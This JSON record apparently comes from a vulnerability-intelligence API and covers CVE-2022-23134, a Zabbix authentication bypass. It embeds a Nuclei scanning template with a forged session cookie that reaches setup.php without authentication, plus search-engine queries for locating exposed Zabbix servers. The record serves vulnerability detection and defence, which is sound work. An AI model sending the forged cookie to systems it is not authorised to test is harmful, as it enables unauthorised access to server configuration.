{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-23134/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-23134/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-23134/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-23134/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-23134/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-23134"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-23134"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2022/CVE-2022-23134.yaml",
      "nuclei_template_severity": "medium",
      "nuclei_template_yaml": "id: CVE-2022-23134\n\ninfo:\n  name: Zabbix Setup Configuration Authentication Bypass\n  author: bananabr\n  severity: medium\n  description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Zabbix setup configuration.\n  remediation: |\n    Apply the latest security patches or updates provided by Zabbix to fix the authentication bypass vulnerability.\n  reference:\n    - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-23134\n    - https://support.zabbix.com/browse/ZBX-20384\n    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6SZYHXINBKCY42ITFSNCYE7KCSF33VRA/\n    - https://lists.debian.org/debian-lts-announce/2022/02/msg00008.html\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2022-23134\n    cwe-id: CWE-287,CWE-284\n    epss-score: 0.84657\n    epss-percentile: 0.99694\n    cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 2\n    vendor: zabbix\n    product: zabbix\n    shodan-query:\n      - http.favicon.hash:892542951\n      - http.title:\"zabbix-server\"\n      - cpe:\"cpe:2.3:a:zabbix:zabbix\"\n    fofa-query:\n      - icon_hash=892542951\n      - app=\"zabbix-监控系统\" && body=\"saml\"\n      - title=\"zabbix-server\"\n    google-query: intitle:\"zabbix-server\"\n  tags: cve,cve2022,zabbix,auth-bypass,kev,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/zabbix/setup.php\"\n      - \"{{BaseURL}}/setup.php\"\n\n    stop-at-first-match: true\n\n    headers:\n      Cookie: \"zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - \"Database\"\n          - \"host\"\n          - \"port\"\n          - \"Zabbix\"\n        condition: and\n\n      - type: word\n        words:\n          - \"youtube_main\"\n          - \"support.google.com\"\n        part: header\n        condition: and\n        negative: true\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502204b72e57103347e7f17433a900558a777a76610fb4d6d34d1c80b368512ac76f5022100d80c63c1e24ca54e6946b7c7c986f76127917d82a4e88889ffca8ef0cd47281e:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2022-23134"
}